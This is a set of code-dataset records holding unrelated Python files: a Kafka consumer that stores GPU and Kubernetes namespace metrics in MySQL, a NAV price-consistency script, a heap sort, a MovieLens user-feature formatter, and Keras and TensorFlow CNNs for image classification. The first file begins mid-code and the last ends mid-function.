0\n# if len(gpu['processes']) > 0:\n# used = 1\n# insertGpuInfo(connection, {'id': gpu_id, 'used': used}, True)\n\n# if args[2] == 'gpu_used_status':\n# connection.cursor().close()\n# connection.close()\n# print(\"gpu {} status is {}\".format(gpu_id, used))\n# return\n\t#print(gpumetric_id)\n''' \n for process in gpu['processes']:\n #process = json.loads(process)\n # gpu processes are all started after container created. 
so it should belong to a container.\n container_id = get_container_id(connection, {\n 'gpu_id': gpu_id, \\\n 'nspid': process['nspid']\n })\n\n if container_id == None:\n break;\n #print(container_id)\n try:\n process_id = insertProcessInfo(connection, {\n\t\t\t 'pid': process['pid'], \\\n\t\t\t 'nspid': process['nspid'], \\\n\t\t\t 'container_id': container_id, \\\n\t\t\t 'command': process['command'], \\\n\t\t\t 'full_command': str(process['full_command']), \\\n\t\t\t 'start_time': process['start_time'],\n\t\t\t 'query_time': gpu['query_time']\n\t\t\t})\n\t #print(process_id)\n metric_id = insertProcessMetric(connection, {\n\t\t\t 'process_id': process_id, \\\n\t\t\t 'gpumetric_id': gpumetric_id, \\\n\t\t\t 'gpu_memory_usage': process['gpu_memory_usage'], \\\n\t\t\t 'cpu_percent': process['cpu_percent'], \\\n\t\t\t 'cpu_memory_usage': str(process['cpu_memory_usage']), \\\n\t\t\t 'query_time': gpu['query_time']\n\t\t\t})\n\n except MySQLdb.Error:\n print(MySQLdb.Error)\n\n connection.cursor().close()\n connection.close()\n'''\nclass Consumer(mp.Process):\n pending_threads = []\n start_threads = []\n threads_count = 0\n def __init__(self, topic, group_id):\n mp.Process.__init__(self)\n self.stop_event = mp.Event()\n self.topic = topic\n self.group_id = group_id\n self.mypartition = TopicPartition(self.topic, 0)\n self.connection = MySQLdb.connect(\n host = mysql_db_host,\n user = mysql_db_user,\n passwd = mysql_db_password,\n db ='computemetrics'\n )\n self.gpu_info_cur = {}\n self.gpu_info_pre = {}\n \n def stop(self):\n self.stop_event.set()\n\n def processMessage(self, message):\n #print(type(message.value))\n if self.topic == 'gpu_metrics':\n if type(message.value) == bytes:\n jsonmsg = json.loads(message.value)\n print(jsonmsg['query_time'])\n #print(type(jsonmsg))\n #if type(jsonmsg) == str:\n # jsonmsg = json.loads(jsonmsg)\n #if checkifexist(self.connection, 'gpumetrics', {'query_time': jsonmsg['query_time']}):\n # return\n\n #threads = []\n for gpu in jsonmsg['gpus']:\n gpu['query_time'] = jsonmsg['query_time']\n gpu['hostname'] = jsonmsg['hostname']\n# print(gpu)\n if self.group_id == 'gpu_used_status':\n gpu_id = get_gpu_id(self.connection, {'uuid': gpu['uuid']})\n\n used = 0\n if len(gpu['processes']) > 0:\n used = 1\n\n insertGpuInfo(self.connection, {'id': gpu_id, 'used': used}, True)\n# print('insert gpu metrics')\n curr_gpumetric_id = insertCurrentGpuMetric(self.connection, {\n 'gpu_id': gpu_id, \\\n 'temperature.gpu': gpu['temperature.gpu'], \\\n 'utilization.gpu': gpu['utilization.gpu'], \\\n 'power.draw': gpu['power.draw'], \\\n 'memory.used': gpu['memory.used'], \\\n 'query_time': gpu['query_time']\n })\n print(\"gpu {} status is {}\".format(gpu_id, used))\n else:\n processGpuMetrics(gpu, self.connection)\n #t = threading.Thread(target=processGpuMetrics, args=(gpu, self.connection, ))\n #t.start()\n\n return ''\n\n if self.topic == 'namespace_metrics':\n #if len(self.gpu_info_pre) == 0:\n self.gpu_info_pre = get_gpu_info_db(self.connection, None, 0)\n\n jsonmsg_all = json.loads(message.value)\n 
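#jsonmsg_all is expected to parse to a list of per-namespace dicts; a sample payload is preserved in the comment below\n 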
#print(jsonmsg_all)\n#{'query_time':'03/03/202009:59:15CST','owner':'admin@kubeflow.org','namespace':'admin','compute-quota':{'hard':{'limits.cpu':'8','limits.memory':'16Gi','limits.nvidia.com/gpu':'2','requests.cpu':'8','requests.memory':'16Gi','requests.nvidia.com/gpu':'2'},'used':{'limits.cpu':'2','limits.memory':'256Mi','requests.cpu':'510m','requests.memory':'1064Mi','requests.nvidia.com/gpu':'2'}},'pods':[{'name':'tf-test-0','start_time':'02/24/202002:32:18UTC','phase':'Running','hostname':'gpu01','containers':[{'name':'tf-test','resources':{'limits':{'nvidia.com/gpu':'2'},'requests':{'cpu':'500m','memory':'1Gi','nvidia.com/gpu':'2'}},'gpu_uuid':['GPU-ab4510fc-c378-5bf5-615e-3bd8a3e141a2','GPU-ee309bde-fc38-b3ea-b5dc-afc17d0d44e1'],'nspid':4026535186},{'name':'istio-proxy','resources':{'limits':{'cpu':'2','memory':'256Mi'},'requests':{'cpu':'10m','memory':'40Mi'}},'nspid':4026535189}]}]}\n #if checkifexist(self.connection, 'namespaceusedresourcequotas', {'query_time': jsonmsg['query_time']}):\n # return\n #print(jsonmsg)\n for jsonmsg in jsonmsg_all:\n\n if jsonmsg.get('compute-quota') != None:\n if jsonmsg['compute-quota']['hard'].get('limits.cpu') == None:\n jsonmsg['compute-quota']['hard']['limits.cpu'] = None\n if jsonmsg['compute-quota']['hard'].get('limits.memory') == None:\n jsonmsg['compute-quota']['hard']['limits.memory'] = None\n if jsonmsg['compute-quota']['hard'].get('limits.nvidia.com/gpu') == None:\n jsonmsg['compute-quota']['hard']['limits.nvidia.com/gpu'] = None\n if jsonmsg['compute-quota']['hard'].get('requests.cpu') == None:\n jsonmsg['compute-quota']['hard']['requests.cpu'] = None\n if jsonmsg['compute-quota']['hard'].get('requests.memory') == None:\n jsonmsg['compute-quota']['hard']['requests.memory'] = None\n if jsonmsg['compute-quota']['hard'].get('requests.nvidia.com/gpu') == None:\n jsonmsg['compute-quota']['hard']['requests.nvidia.com/gpu'] = None\n else:\n jsonmsg['compute-quota'] = {}\n jsonmsg['compute-quota']['hard'] = {}\n jsonmsg['compute-quota']['hard']['limits.cpu'] = None\n jsonmsg['compute-quota']['hard']['limits.memory'] = None\n jsonmsg['compute-quota']['hard']['limits.nvidia.com/gpu'] = None\n jsonmsg['compute-quota']['hard']['requests.cpu'] = None\n jsonmsg['compute-quota']['hard']['requests.memory'] = None\n jsonmsg['compute-quota']['hard']['requests.nvidia.com/gpu'] = None\n\n namespace_id = insertNamespaceInfo(self.connection, {\n 'name': jsonmsg['namespace'], \\\n 'owner': jsonmsg['owner'], \\\n 'limits.cpu': jsonmsg['compute-quota']['hard']['limits.cpu'], \\\n 'limits.memory': jsonmsg['compute-quota']['hard']['limits.memory'], \\\n 'limits.nvidia.com/gpu': jsonmsg['compute-quota']['hard']['limits.nvidia.com/gpu'], \\\n 'requests.cpu': jsonmsg['compute-quota']['hard']['requests.cpu'], \\\n 'requests.memory': jsonmsg['compute-quota']['hard']['requests.memory'], \\\n 'requests.nvidia.com/gpu': jsonmsg['compute-quota']['hard']['requests.nvidia.com/gpu'] \\\n })\n\n\n needGetFromContainer = False\n if jsonmsg.get('compute-quota') != None and False:\n if jsonmsg['compute-quota'].get('used') != None:\n if jsonmsg['compute-quota']['used'].get('limits.cpu') == None:\n jsonmsg['compute-quota']['used']['limits.cpu'] = None\n if jsonmsg['compute-quota']['used'].get('limits.memory') == None:\n jsonmsg['compute-quota']['used']['limits.memory'] = None\n if jsonmsg['compute-quota']['used'].get('limits.nvidia.com/gpu') == None:\n jsonmsg['compute-quota']['used']['limits.nvidia.com/gpu'] = None\n if jsonmsg['compute-quota']['used'].get('requests.cpu') == 
None:\n jsonmsg['compute-quota']['used']['requests.cpu'] = None\n if jsonmsg['compute-quota']['used'].get('requests.memory') == None:\n jsonmsg['compute-quota']['used']['requests.memory'] = None\n if jsonmsg['compute-quota']['used'].get('requests.nvidia.com/gpu') == None:\n jsonmsg['compute-quota']['used']['requests.nvidia.com/gpu'] = None\n namespaceusedrq_id = insertNamespaceUsedResourceQuotas(self.connection, {\n 'namespace_id': namespace_id, \\\n 'limits.cpu': jsonmsg['compute-quota']['used']['limits.cpu'], \\\n 'limits.memory': jsonmsg['compute-quota']['used']['limits.memory'], \\\n 'limits.nvidia.com/gpu': jsonmsg['compute-quota']['used']['limits.nvidia.com/gpu'], \\\n 'requests.cpu': jsonmsg['compute-quota']['used']['requests.cpu'], \\\n 'requests.memory': jsonmsg['compute-quota']['used']['requests.memory'], \\\n 'requests.nvidia.com/gpu': jsonmsg['compute-quota']['used']['requests.nvidia.com/gpu'], \\\n 'query_time': jsonmsg['query_time']\n })\n else:\n needGetFromContainer = True\n jsonmsg['compute-quota']['used'] = {}\n jsonmsg['compute-quota']['used']['limits.cpu'] = 0\n jsonmsg['compute-quota']['used']['limits.memory'] = 0\n jsonmsg['compute-quota']['used']['limits.nvidia.com/gpu'] = 0\n jsonmsg['compute-quota']['used']['requests.cpu'] = 0\n jsonmsg['compute-quota']['used']['requests.memory'] = 0\n jsonmsg['compute-quota']['used']['requests.nvidia.com/gpu'] = 0\n\n if jsonmsg.get('pods') != None:\n for pod in jsonmsg['pods']:\n pod_id = insertPodInfo(self.connection, {\n 'name': pod['name'], \\\n 'start_time': pod['start_time'], \\\n 'namespace_id': namespace_id, \\\n 'hostname': pod['hostname'], \\\n 'phase': pod['phase'], \\\n 'query_time': jsonmsg['query_time']\n })\n\n for container in pod['containers']:\n if container['resources'].get('limits') != None:\n if container['resources']['limits'].get('cpu') == None:\n container['resources']['limits']['cpu'] = 0\n if container['resources']['limits'].get('memory') == None:\n container['resources']['limits']['memory'] = 0\n if container['resources']['limits'].get('nvidia.com/gpu') == None:\n container['resources']['limits']['nvidia.com/gpu'] = 0\n else:\n container['resources']['limits'] = {'cpu': 0, 'memory': 0, 'nvidia.com/gpu': 0}\n #continue\n #container['resources']['limits']['cpu'] = None\n #container['resources']['limits']['memory'] = None\n #container['resources']['limits']['nvidia.com/gpu'] = None\n\n if container['resources'].get('requests') != None:\n if container['resources']['requests'].get('cpu') == None:\n container['resources']['requests']['cpu'] = 0\n if container['resources']['requests'].get('memory') == None:\n container['resources']['requests']['memory'] = 0\n if container['resources']['requests'].get('nvidia.com/gpu') == None:\n container['resources']['requests']['nvidia.com/gpu'] = 0\n else:\n container['resources']['requests'] = {'cpu': 0, 'memory': 0, 'nvidia.com/gpu': 0}\n #continue\n #container['resources']['requests']['cpu'] = None\n #container['resources']['requests']['memory'] = None\n #container['resources']['requests']['nvidia.com/gpu'] = None\n \n if needGetFromContainer and False:\n print(container)\n jsonmsg['compute-quota']['used']['limits.cpu'] += conv2G(container['resources']['limits']['cpu'])\n jsonmsg['compute-quota']['used']['limits.memory'] += conv2G(container['resources']['limits']['memory'])\n jsonmsg['compute-quota']['used']['limits.nvidia.com/gpu'] += conv2G(container['resources']['limits']['nvidia.com/gpu'])\n jsonmsg['compute-quota']['used']['requests.cpu'] += 
conv2G(container['resources']['requests']['cpu'])\n jsonmsg['compute-quota']['used']['requests.memory'] += conv2G(container['resources']['requests']['memory'])\n jsonmsg['compute-quota']['used']['requests.nvidia.com/gpu'] += conv2G(container['resources']['requests']['nvidia.com/gpu'])\n\n container_id = insertContainerInfo(self.connection, {\n 'pod_id': pod_id, \\\n 'name': container['name'], \\\n 'limits.cpu': container['resources']['limits']['cpu'], \\\n 'limits.memory': container['resources']['limits']['memory'], \\\n 'limits.nvidia.com/gpu': container['resources']['limits']['nvidia.com/gpu'], \\\n 'requests.cpu': container['resources']['requests']['cpu'], \\\n 'requests.memory': container['resources']['requests']['memory'], \\\n 'requests.nvidia.com/gpu': container['resources']['requests']['nvidia.com/gpu'], \\\n 'nspid': container['nspid'], \\\n 'query_time': jsonmsg['query_time']\n })\n if container.get('gpu_uuid') != None:\n for gpu_uuid in container['gpu_uuid']:\n #print(gpu_uuid)\n gpu_id = get_gpu_id(self.connection, {'uuid': gpu_uuid})\n\n insertContainerGpus(self.connection, {\n 'pod_id': pod_id, \\\n 'container_id': container_id, \\\n 'gpu_id': gpu_id, \\\n 'nspid': container['nspid'], \\\n 'namespace_id': namespace_id\n })\n\n if self.gpu_info_cur.get(gpu_id) == None:\n self.gpu_info_cur[gpu_id] = namespace_id\n\n if needGetFromContainer and False:\n namespaceusedrq_id = insertNamespaceUsedResourceQuotas(self.connection, {\n 'namespace_id': namespace_id, \\\n 'limits.cpu': jsonmsg['compute-quota']['used']['limits.cpu'], \\\n 'limits.memory': jsonmsg['compute-quota']['used']['limits.memory'], \\\n 'limits.nvidia.com/gpu': jsonmsg['compute-quota']['used']['limits.nvidia.com/gpu'], \\\n 'requests.cpu': jsonmsg['compute-quota']['used']['requests.cpu'], \\\n 'requests.memory': jsonmsg['compute-quota']['used']['requests.memory'], \\\n 'requests.nvidia.com/gpu': jsonmsg['compute-quota']['used']['requests.nvidia.com/gpu'], \\\n 'query_time': jsonmsg['query_time']\n })\n\n return self.topic\n\n def processGpuStatus(self, hostname):\n print(self.topic)\n set_add = set()\n set_del = set()\n if self.topic == 'namespace_metrics':\n #print(self.gpu_info_cur)\n set_cur = set(self.gpu_info_cur.items())\n print(\"set_cur\", set_cur)\n\n set_pre = set(self.gpu_info_pre.items())\n print(\"set_pre\", set_pre)\n\n set_add = set_cur - set_pre\n set_del = set_pre - set_cur\n print(\"add \", set_add)\n print(\"del \", set_del)\n\n #self.gpu_info_pre = self.gpu_info_cur\n #print(\"pre\", self.gpu_info_pre)\n self.gpu_info_cur = {}\n\n for v in set_add:\n insertGpuInfo(self.connection, {'id': v[0], 'user': v[1]}, True)\n for v in set_del:\n insertGpuInfo(self.connection, {'id': v[0], 'user': None}, True)\n\n def run(self):\n consumer = KafkaConsumer(bootstrap_servers=kafka_broker+':9092',\n #auto_offset_reset='earliest',\n group_id = self.group_id,\n enable_auto_commit = True,\n consumer_timeout_ms = 100)\n consumer.subscribe([self.topic])\n\n try:\n while not self.stop_event.is_set():\n for message in consumer:\n topic = self.processMessage(message)\n #if self.topic == 'namespace_metrics':\n self.processGpuStatus(topic)\n #pos = consumer.position(self.mypartition)\n #print(\"[most recent offset]=\", pos)\n if self.stop_event.is_set():\n break\n except KeyboardInterrupt:\n print(\"stop!\")\n self.stop()\n \n consumer.close()\n \ndef main():\n tasks = [\n Consumer(topic = \"namespace_metrics\", group_id = \"namespace_metrics\"),\n Consumer(topic = \"gpu_metrics\", group_id = \"gpu_metrics\"),\n 
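#same topic, different group id: this consumer re-reads gpu_metrics so the used-status pass keeps independent Kafka offsets (assumed intent)\n 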
Consumer(topic = \"gpu_metrics\", group_id = \"gpu_used_status\")\n ]\n\n for t in tasks:\n t.start()\n time.sleep(2)\n\n #for t in tasks:\n # t.join()\n\n #time.sleep(10)\n \n #for task in tasks:\n # task.stop()\n\n #for task in tasks:\n # task.join()\n \n \nif __name__ == \"__main__\":\n logging.basicConfig(\n format='%(asctime)s.%(msecs)s:%(name)s:%(thread)d:%(levelname)s:%(process)d:%(message)s',\n level=logging.INFO\n )\n main()\n","sub_path":"k8sdeployment/metric_consumer/kafka_consumer/metrics_consumer.py","file_name":"metrics_consumer.py","file_ext":"py","file_size_in_byte":43341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"323836250","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.abspath(__file__)) + \"/..\")\n\n\nfrom libs.ppstdlib import list_of_files\nimport pandas as pd\nfrom datetime import datetime as dt\n\nif len (sys.argv) != 2 :\n print (\"Usage: Directory of Data\")\n sys.exit (1)\n\narguments = sys.argv[1:]\n\n\n# setting up directory path\ndirpath = '/var/prism/Central/raw/amfi/{}/'.format(arguments[0])\n\n# Get all csv files to process\nlist_of_files = list_of_files(dirpath, \"csv\")\n\n# Extract times from the files and make list of times and sort it\ntime_list = set()\n\nfor path in list_of_files:\n if path:\n if \"_\" in path:\n time = path.rsplit('.')[0].rsplit('_')[1]\n time_list.add(dt.strptime(time, \"%H:%M:%S\"))\n\ntime_list = sorted(time_list)\n\n\nif list_of_files:\n date = list_of_files[0].rsplit('.')[0].rsplit('_')[0]\n\n# Get earliest file and load into pandas Data Frame\ntime_s = dt.strftime(time_list[1], \"%H:%M:%S\")\nfile = \"{}_{}.csv\".format(date, time_s)\nmerged_df = pd.read_csv(dirpath + file)\nmerged_df = merged_df[['Scheme Name','Net Asset Value']]\nprint(merged_df.head())\nmerged_df = start_df = merged_df.rename(columns = {'Net Asset Value':'pri'})\n\n# Rename the name of the column 'pri' with 'pri_'\nstart_suffix = dt.strftime(time_list[1], \"_%H:%M\")\nmerged_df = merged_df.rename(columns = {'pri':'pri{}'.format(start_suffix)})\n\nfor time in time_list[2:]:\n time_s = dt.strftime(time, \"%H:%M:%S\")\n end_prefix = dt.strftime(time, \"_%H:%M\")\n file = \"{}_{}.csv\".format(date, time_s)\n frame = pd.read_csv(dirpath + file)\n\n frame = frame[['Scheme Name','Net Asset Value']]\n print(frame.head())\n frame = frame.rename(columns = {'Net Asset Value':'pri'})\n\n inter_df = pd.merge(start_df, frame, on='Scheme Name', how='inner', \n suffixes=[start_suffix, end_prefix])\n\n merged_df = pd.merge(merged_df, inter_df[['Scheme Name','pri'+end_prefix]], on='Scheme Name', how='right')\n\n start_df = frame\n start_suffix = end_prefix\n\n# print(merged_df.info())\n# merged_df = merged_df.drop(['pri'],axis=1)\n# merged_df = merged_df.loc[:, ~merged_df.columns.str.endswith('_y')]\nprint(merged_df.head())\n\nstart = dt.strftime(time_list[1], \"%H:%M\")\nfor time in time_list[2:]:\n end = dt.strftime(time, \"%H:%M\")\n print(\"Comparing prices consistency between {} and {}\".format(start,end))\n print(merged_df.loc[merged_df['pri_'+start]!=merged_df['pri_'+end]].dropna())\n print(\"---------------------------------------------------------------------\")\n start = end\n","sub_path":"server/amfipriceflowbytime.py","file_name":"amfipriceflowbytime.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"461187565","text":"# Imports\nimport numpy as 
np\nnp.random.seed(123)\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nimport keras.utils\nfrom keras.datasets import mnist\nfrom matplotlib import pyplot as plt\nfrom keras import backend\n\n# Variables\nbatch_size = 128\nnum_classes = 10\nepochs = 12\nimg_rows, img_cols = 28, 28\n\n# Downloading Data\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nx_train = x_train.astype('float32')/255\nx_test = x_test.astype('float32')/255\n\n# Fixing training dimensions\nif backend.image_data_format() == 'channels_first':\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\nelse:\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n\n# convert class vectors to binary class matrices\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\n# Define model architecture\nmodel = Sequential()\n \nmodel.add(Conv2D(32, (3, 3), activation='relu', input_shape=input_shape))\nmodel.add(Conv2D(32, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.25))\n \nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\n \n# Compile model\nmodel.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n \n# Fit model on training data ('epochs' replaces the deprecated nb_epoch kwarg)\nmodel.fit(x_train, y_train, \n batch_size=32, epochs=10, verbose=1)\n \n# Evaluate model on test data\nscore = model.evaluate(x_test, y_test, verbose=0)","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"58476405","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n'''\nHeap sort:\nPython's heapq module implements a min-heap (it can also be viewed as a complete binary tree whose root is the minimum).\nIn a heapq array the first value is always the smallest,\nand heap[k] <= heap[2*k+1], heap[k] <= heap[2*k+2].\nAlgorithm reference: http://bubkoo.com/2014/01/14/sort-algorithm/heap-sort/\n'''\n\nimport random\nfrom heapq import *\n\n\ndef heapSort(seq):\n heapify(seq)\n return [heappop(seq) for i in range(len(seq))]\n\nseq = list(range(100))\nrandom.shuffle(seq)\nprint(seq)\nprint(heapSort(seq))\n","sub_path":"sortAlgorithms/heap_sort.py","file_name":"heap_sort.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"276013183","text":"import csv\n\ndef format_sex(sex):\n if sex == 'M':\n return [0]\n else:\n return [1]\n\ndef format_occ(occ, mapped):\n map_occ_id1 = {\"other\" : 0, \"academic\" : 1, \"educator\" : 1, \"artist\" : 2, \"clerical\" : 3, \"admin\" : 3, \"college\" : 4, \"grad student\" : 4,\n \"customer service\" : 5, \"doctor\" : 6, \"health care\" : 6, \"executive\" : 7, \"managerial\" : 7, \"farmer\" : 8, \"homemaker\" : 9,\n \"K-12 student\" : 10, \"lawyer\" : 11, \"programmer\" : 12, \"retired\" : 13, \"sales\" : 14, \"marketing\" : 14, \"scientist\" : 15,\n \"self-employed\" : 16, \"technician\" : 17, \"engineer\" : 17, \"tradesman\" : 18, \"craftsman\" : 18, \"unemployed\" : 19, \"writer\" : 20}\n\n map_occ_id2 = {'administrator': 4, 'executive': 3, 'retired': 18, 'lawyer': 6, 'entertainment': 9, 'marketing': 15, 
'writer': 2, \n 'none': 16, 'scientist': 8, 'healthcare': 17, 'other': 1, 'student': 5, 'educator': 7, 'technician': 0, \n 'librarian': 11, 'programmer': 10, 'artist': 13, 'salesman': 19, 'doctor': 20, 'homemaker': 12, 'engineer': 14}\n\n ret = [0 for x in range(21)]\n\n if not mapped:\n if occ in map_occ_id2:\n ret[map_occ_id2[occ]] = 1\n return ret\n else:\n ret[int(occ)] = 1\n return ret\n\ndef format_age(age):\n ret = [0 for x in range(7)]\n\n age = int(age)\n\n if age < 18:\n ret[0] = 1\n elif age >= 18 and age <= 24:\n ret[1] = 1\n elif age >= 25 and age <= 34:\n ret[2] = 1\n elif age >= 35 and age <= 44:\n ret[3] = 1\n elif age >= 45 and age <= 49:\n ret[4] = 1\n elif age >= 50 and age <= 55:\n ret[5] = 1\n elif age >= 56:\n ret[6] = 1\n\n\n return ret\n\n\nr = csv.reader(open('ml-100k/u.user','rb'), delimiter='|')\nw = csv.writer(open('ml-100k/u.user.mod','wb'), delimiter='|')\n\nfor row in r:\n w.writerow([row[0]] + format_age(row[1]) + format_sex(row[2]) + format_occ(row[3], False))\n\nr = csv.reader(open('ml-1m/users.dat','rb'), delimiter='|')\nw = csv.writer(open('ml-1m/users.dat.mod','wb'), delimiter='|')\n\nfor row in r:\n w.writerow([row[0]] + format_age(row[2]) + format_sex(row[1]) + format_occ(row[3], True))\n","sub_path":"user_info_formator.py","file_name":"user_info_formator.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"585091476","text":"\n# Imports\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport random\nimport math\nfrom scipy.misc import imsave\n\n###\n### Convolutional Neural Network (CNN) for MNIST\n###\nclass CnnData2: ##### OBS: only works if stride size = filter size of pooling layer\n \n def __init__( self, session, n_in = 128, n_out = 3,\n filterSizeConv1 = 5, nFiltersConv1 = 32, \n filterSizeConv2 = 5, nFiltersConv2 = 32,\n filterSizeConv3 = 5, nFiltersConv3 = 64, \n filterSizePool1 = 2, strideFilter1 = 2,\n filterSizePool2 = 2, strideFilter2 = 2,\n filterSizePool3 = 2, strideFilter3 = 2,\n nChannels = 3, fcUnits = 1024, mode = True ):\n\n \t# instantiate session\n self.session = session\n self.n_in = n_in # number of pixels\n self.n_out = n_out # number of classes\n self.mode = mode #True to train\n self.nChannels = nChannels # number of channels (1=grayscale;3=colored)\n\n # convolution filter sizes\n self.filterSizeConv1 = filterSizeConv1\n self.filterSizeConv2 = filterSizeConv2\n self.filterSizeConv3 = filterSizeConv3\n \n # number of filters of each convolutional layer\n self.nFiltersConv1 = nFiltersConv1\n self.nFiltersConv2 = nFiltersConv2\n self.nFiltersConv3 = nFiltersConv3\n\n # pooling layer filter sizes\n self.filterSizePool1 = filterSizePool1\n self.filterSizePool2 = filterSizePool2\n self.filterSizePool3 = filterSizePool3\n\n # pooling layer stride\n self.strideFilter1 = strideFilter1\n self.strideFilter2 = strideFilter2\n self.strideFilter3 = strideFilter3\n\n # data placeholders\n #self.x = tf.placeholder(tf.float32, [None, n_in, n_in, nChannels], name='x')\n self.x = tf.placeholder(tf.float32, [None, int(n_in * n_in * nChannels )], name='x')\n self.y = tf.placeholder(tf.float32, [None, n_out], name='y')\n #self.x_in = tf.reshape(self.x, [-1, self.n_in * self.n_in])\n self.W_c1 = tf.get_variable( 'W_c1', shape = [ filterSizeConv1, filterSizeConv1, nChannels, nFiltersConv1 ] )\n self.W_c2 = tf.get_variable( 'W_c2', shape = [ filterSizeConv2, filterSizeConv2, nFiltersConv1, nFiltersConv2 ] )\n self.W_c3 = 
tf.get_variable( 'W_c3', shape = [ filterSizeConv3, filterSizeConv3, nFiltersConv2, nFiltersConv3 ] )\n\n ##\n ## Network Architecture\n ##\n\n # Input Layer\n self.input_layer = tf.reshape(self.x, [-1, self.n_in, self.n_in, self.nChannels])\n\n #\n # Convolutional Layer #1\n #\n\n # filter\n self.conv1 = tf.nn.conv2d(\n input = self.input_layer,\n filter = self.W_c1,\n padding = \"SAME\",\n strides = [1,1,1,1] )\n\n # relu\n self.relu1 = tf.nn.relu( self.conv1 )\n\n #\n # Pooling Layer #1\n #\n self.pool1 = tf.layers.max_pooling2d(inputs=self.relu1, pool_size=[self.filterSizePool1, self.filterSizePool1], strides=self.strideFilter1)\n\n\n #\n # Convolutional Layer #2\n #\n\n # filter b\n self.conv2 = tf.nn.conv2d(\n input = self.pool1,\n filter = self.W_c2,\n padding = \"SAME\",\n strides = [1,1,1,1] )\n\n # relu\n self.relu2 = tf.nn.relu( self.conv2 )\n\n #\n # Pooling layer #2\n #\n self.pool2 = tf.layers.max_pooling2d(inputs=self.relu2, pool_size=[self.filterSizePool2, self.filterSizePool2], strides=self.strideFilter2)\n\n\n #\n # Convolutional Layer #3\n #\n\n # filter\n self.conv3 = tf.nn.conv2d(\n input = self.pool2,\n filter = self.W_c3,\n padding = \"SAME\",\n strides = [1,1,1,1] )\n\n # relu\n self.relu3 = tf.nn.relu( self.conv3 )\n\n #\n # Pooling layer #3\n #\n self.pool3 = tf.layers.max_pooling2d(inputs=self.relu3, pool_size=[self.filterSizePool3, self.filterSizePool3], strides=self.strideFilter3)\n\n\n #\n # Dense Layer ---> PARAMETRIZE! change this 7\n #\n nReshape = (self.n_in/filterSizePool1/filterSizePool2/filterSizePool3) * (self.n_in/filterSizePool1/filterSizePool2/filterSizePool3) * nFiltersConv3\n pool3_flat = tf.reshape(self.pool3, [-1, int(nReshape)])\n dense = tf.layers.dense(inputs=pool3_flat, units=fcUnits, activation=tf.nn.relu)\n dropout = tf.layers.dropout(\n inputs=dense, rate=0.3, training = self.mode )\n\n # Logits Layer\n self.logits = tf.layers.dense(inputs=dropout, units = self.n_out)\n self.q = tf.argmax(input = self.logits, axis = 1) # leave 1?\n \n # Output Layer\n onehot_labels = tf.one_hot( indices = tf.cast(self.y, tf.int32), depth = self.n_out )\n self.loss = tf.nn.softmax_cross_entropy_with_logits(\n labels = self.y, logits = self.logits )\n\n self.train_step = tf.train.AdamOptimizer(1e-3).minimize(self.loss)\n\n \n # method to compute y given x\n def compute(self, x):\n return self.session.run(self.q, feed_dict={self.x:np.reshape(x,[-1,int(self.n_in*self.n_in*self.nChannels)])})\n #return self.session.run(self.q, feed_dict={self.x:np.reshape(x,[-1, self.n_in, self.n_in, self.nChannels])})\n \n # method to train network\n def train(self, x_batch, y_batch): \n # take a training step\n #_ = self.session.run(self.train_step, feed_dict={self.x: x_batch, self.y: y_batch})\n _ = self.session.run(self.train_step, feed_dict={self.x:np.reshape(x_batch,[-1,int(self.n_in*self.n_in*self.nChannels)]), self.y: y_batch})\n\n # acessor method for output after pooling layers\n def getPools(self):\n return ( self.pool1, self.pool2, self.pool3 )\n\n # acessor method for output after convolutional layers\n def getConvs(self):\n \treturn ( self.conv1, self.conv2, self.conv3 )\n\n # acessor method for loss\n def getLoss(self):\n return self.loss\n\n # acessor method to get filter weights of convolutional layers\n def getWeights(self):\n return (self.W_c1, self.W_c2, self.W_c3 )\n\n # method to initialize filter weights\n def initWeight(shape):\n weights = tf.truncated_normal(shape,stddev=0.1)\n return tf.Variable(weights)\n\n # method to instantiate deconvolutional 
neural net\n def createDeconvNet(self, inputImage, inputLabel):\n return CnnData2.DeconvData2( self, self.session, inputImage, inputLabel )\n\n # saver method to save trained cnn in disk \n def netSaver(self, savePath):\n saver = tf.train.Saver()\n saver.save(self.session, savePath)\n print(\"Model saved in file: %s\" % savePath)\n\n # loader method to restore weights of a pretrained cnn\n def netLoader(self, loadPath):\n loader = tf.train.Saver({\"W_c1\":self.W_c1, \"W_c2\":self.W_c2, \"W_c3\":self.W_c3})\n restoredModel= loader.restore(self.session, loadPath)\n print(\"Model restored from %s\" % loadPath)\n\n\n def activate(self, layer, image, sess):\n# \"\"\"\n# Within a tensorflow session, calls plotfilter\n# to display the activations of trained filters in a specific layer\n# after passsing an image.\n#\n# Parameters\n# ----\n# layer: int\n# image: ndarray of length 784\n# \"\"\"\n \n \n conv_layer = sess.run(layer, feed_dict={self.x:np.reshape(image, [ 1, 49152], order='F')})\n \n 